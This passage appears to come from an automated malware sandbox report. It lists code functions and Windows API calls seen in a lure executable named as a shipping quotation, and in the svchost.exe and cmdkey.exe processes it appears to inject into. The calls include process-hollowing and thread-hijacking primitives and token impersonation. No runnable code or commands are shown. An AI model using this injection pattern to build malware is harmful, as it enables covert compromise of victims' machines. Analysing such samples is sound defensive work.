              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039738D0 NtGetContextThread,1_2_039738D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973C90 NtOpenThread,1_2_03973C90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973C30 NtOpenProcessToken,1_2_03973C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C93771 NtSuspendThread,1_2_03C93771
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C93460 NtSetContextThread,1_2_03C93460
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C93A80 NtResumeThread,1_2_03C93A80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B10 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03792B10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B00 NtQueryValueKey,LdrInitializeThunk,3_2_03792B00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_03792BC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03792B90
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B80 NtCreateKey,LdrInitializeThunk,3_2_03792B80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792A10 NtWriteFile,LdrInitializeThunk,3_2_03792A10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792AC0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03792AC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792A80 NtClose,LdrInitializeThunk,3_2_03792A80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037929F0 NtReadFile,LdrInitializeThunk,3_2_037929F0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792F00 NtCreateFile,LdrInitializeThunk,3_2_03792F00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792E50 NtCreateSection,LdrInitializeThunk,3_2_03792E50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_03792D10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C30 NtMapViewOfSection,LdrInitializeThunk,3_2_03792C30
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792CF0 NtDelayExecution,LdrInitializeThunk,3_2_03792CF0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037934E0 NtCreateMutant,LdrInitializeThunk,3_2_037934E0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03794260 NtSetContextThread,3_2_03794260
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03794570 NtSuspendThread,3_2_03794570
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792B20 NtQueryInformationProcess,3_2_03792B20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792BE0 NtQueryVirtualMemory,3_2_03792BE0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792AA0 NtQueryInformationFile,3_2_03792AA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037929D0 NtWaitForSingleObject,3_2_037929D0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792F30 NtOpenDirectoryObject,3_2_03792F30
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792FB0 NtSetValueKey,3_2_03792FB0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792E00 NtQueueApcThread,3_2_03792E00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792ED0 NtResumeThread,3_2_03792ED0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792EC0 NtQuerySection,3_2_03792EC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792EB0 NtProtectVirtualMemory,3_2_03792EB0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792E80 NtCreateProcessEx,3_2_03792E80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792D50 NtWriteVirtualMemory,3_2_03792D50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792DC0 NtAdjustPrivilegesToken,3_2_03792DC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792DA0 NtReadVirtualMemory,3_2_03792DA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C50 NtUnmapViewOfSection,3_2_03792C50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C20 NtSetInformationFile,3_2_03792C20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792C10 NtOpenProcess,3_2_03792C10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03792CD0 NtEnumerateKey,3_2_03792CD0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037938D0 NtGetContextThread,3_2_037938D0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03793C30 NtOpenProcessToken,3_2_03793C30
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03793C90 NtOpenThread,3_2_03793C90
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347EF38 NtQueryInformationProcess,NtReadVirtualMemory,3_2_0347EF38
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483778 NtSuspendThread,3_2_03483778
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483468 NtSetContextThread,3_2_03483468
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0348448D NtMapViewOfSection,3_2_0348448D
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483A88 NtResumeThread,3_2_03483A88
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03484848 NtUnmapViewOfSection,3_2_03484848
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347F800 NtMapViewOfSection,3_2_0347F800
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03483D98 NtQueueApcThread,3_2_03483D98
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0069D5EB
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00691201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00691201
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0069E8F6
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006380600_2_00638060
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A20460_2_006A2046
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006982980_2_00698298
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0066E4FF0_2_0066E4FF
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0066676B0_2_0066676B
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006C48730_2_006C4873
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0063CAF00_2_0063CAF0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0065CAA00_2_0065CAA0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0064CC390_2_0064CC39
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00666DD90_2_00666DD9
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0064D07D0_2_0064D07D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0064B1190_2_0064B119
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006391C00_2_006391C0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006513940_2_00651394
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006517060_2_00651706
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0065781B0_2_0065781B
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0064997D0_2_0064997D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006379200_2_00637920
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006519B00_2_006519B0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00657A4A0_2_00657A4A
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00651C770_2_00651C77
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00657CA70_2_00657CA7
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006BBE440_2_006BBE44
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00669EEE0_2_00669EEE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0063BF400_2_0063BF40
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00651F320_2_00651F32
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106D1200_2_0106D120
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004189431_2_00418943
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F0531_2_0042F053
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010001_2_00401000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030D01_2_004030D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100FA1_2_004100FA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101031_2_00410103
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012C01_2_004012C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B401_2_00416B40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B431_2_00416B43
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103231_2_00410323
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3231_2_0040E323
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4671_2_0040E467
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4731_2_0040E473
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027801_2_00402780
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3101_2_0394E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039022451_2_03902245
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0010E1_2_03A0010E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039300A01_2_039300A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE0761_2_039EE076
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F67571_2_039F6757
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A7601_2_0394A760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039427601_2_03942760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039406801_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA6C01_2_039FA6C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C6E01_2_0393C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C6001_2_0395C600
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039646701_2_03964670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A5261_2_03A0A526
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039404451_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC01_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B101_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCA131_2_039FCA13
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEA5B1_2_039FEA5B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A01_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FE9A61_2_039FE9A6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DC89F1_2_039DC89F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039568821_2_03956882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C01_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8101_2_0396E810
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E08351_2_039E0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268681_2_03926868
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEFBF1_2_039FEFBF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946FE01_2_03946FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394CF001_2_0394CF00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EAD1_2_039F0EAD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932EE81_2_03932EE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960E501_2_03960E50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982E481_2_03982E48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0E6D1_2_039E0E6D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952DB01_2_03952DB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AD001_2_0393AD00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940D691_2_03940D69
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958CDF1_2_03958CDF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0ACEB1_2_03A0ACEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930C121_2_03930C12
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AC201_2_0394AC20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEC201_2_039BEC20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EEC4C1_2_039EEC4C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6C691_2_039F6C69
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEC601_2_039FEC60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039313801_2_03931380
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF3301_2_039FF330
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D2EC1_2_0392D2EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F124C1_2_039F124C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039451C01_2_039451C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B1E01_2_0395B1E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1131_2_0392F113
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD1301_2_039DD130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398717A1_2_0398717A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397508C1_2_0397508C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B0D01_2_0394B0D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70F11_2_039F70F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF6F61_2_039FF6F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B36EC1_2_039B36EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD62C1_2_039DD62C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ED6461_2_039ED646
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF5C91_2_039FF5C9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75C61_2_039F75C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D54901_2_039D5490
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD4801_2_039AD480
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D1B801_2_039D1B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DB191_2_0397DB19
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB2E1_2_039FFB2E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA891_2_039FFA89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FAA01_2_0395FAA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039859C01_2_039859C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039099E81_2_039099E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B98B21_2_039B98B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F18DA1_2_039F18DA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F78F31_2_039F78F3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438001_2_03943800
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039498701_2_03949870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B8701_2_0395B870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B58701_2_039B5870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF8721_2_039FF872
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1FC61_2_039F1FC6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFF401_2_039BFF40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF631_2_039FFF63
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941EB21_2_03941EB2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F9ED21_2_039F9ED2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949DD01_2_03949DD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFDF41_2_039DFDF4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFD271_2_039FFD27
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D4C1_2_039F7D4C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D9C981_2_039D9C98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C7CE81_2_039C7CE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FCE01_2_0395FCE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943C601_2_03943C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8E3731_2_03C8E373
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8E2551_2_03C8E255
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8D7D81_2_03C8D7D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8E7141_2_03C8E714
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8CA881_2_03C8CA88
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347E3732_2_0347E373
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347E7142_2_0347E714
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347D7D82_2_0347D7D8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347E2552_2_0347E255
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_0347CA882_2_0347CA88
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376E3103_2_0376E310
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037222453_2_03722245
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0382010E3_2_0382010E
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037500A03_2_037500A0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0380E0763_2_0380E076
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037627603_2_03762760
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376A7603_2_0376A760
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038167573_2_03816757
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037846703_2_03784670
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381A6C03_2_0381A6C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377C6003_2_0377C600
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0375C6E03_2_0375C6E0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037606803_2_03760680
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0382A5263_2_0382A526
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037604453_2_03760445
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03760B103_2_03760B10
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D4BC03_2_037D4BC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03802AC03_2_03802AC0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381CA133_2_0381CA13
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381EA5B3_2_0381EA5B
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381E9A63_2_0381E9A6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0375E9A03_2_0375E9A0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037468683_2_03746868
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0378E8103_2_0378E810
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038008353_2_03800835
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037628C03_2_037628C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FC89F3_2_037FC89F
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037768823_2_03776882
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381EFBF3_2_0381EFBF
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376CF003_2_0376CF00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03766FE03_2_03766FE0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03780E503_2_03780E50
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03810EAD3_2_03810EAD
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A2E483_2_037A2E48
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03752EE83_2_03752EE8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03800E6D3_2_03800E6D
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03760D693_2_03760D69
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0375AD003_2_0375AD00
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03772DB03_2_03772DB0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376AC203_2_0376AC20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037DEC203_2_037DEC20
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03750C123_2_03750C12
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0382ACEB3_2_0382ACEB
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03778CDF3_2_03778CDF
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0380EC4C3_2_0380EC4C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381EC603_2_0381EC60
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03816C693_2_03816C69
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F3303_2_0381F330
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037513803_2_03751380
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0374D2EC3_2_0374D2EC
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381124C3_2_0381124C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A717A3_2_037A717A
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FD1303_2_037FD130
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0374F1133_2_0374F113
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377B1E03_2_0377B1E0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037651C03_2_037651C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038291433_2_03829143
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038170F13_2_038170F1
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0376B0D03_2_0376B0D0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0379508C3_2_0379508C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037217073_2_03721707
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FD62C3_2_037FD62C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F6F63_2_0381F6F6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D36EC3_2_037D36EC
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038016233_2_03801623
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0380D6463_2_0380D646
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A55503_2_037A5550
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038175C63_2_038175C6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F5C93_2_0381F5C9
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037F54903_2_037F5490
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037CD4803_2_037CD480
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0379DB193_2_0379DB19
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FB2E3_2_0381FB2E
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037F1B803_2_037F1B80
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FA893_2_0381FA89
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377FAA03_2_0377FAA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037299E83_2_037299E8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037A59C03_2_037A59C0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037698703_2_03769870
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377B8703_2_0377B870
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D58703_2_037D5870
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038118DA3_2_038118DA
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_038178F33_2_038178F3
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037638003_2_03763800
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037D98B23_2_037D98B2
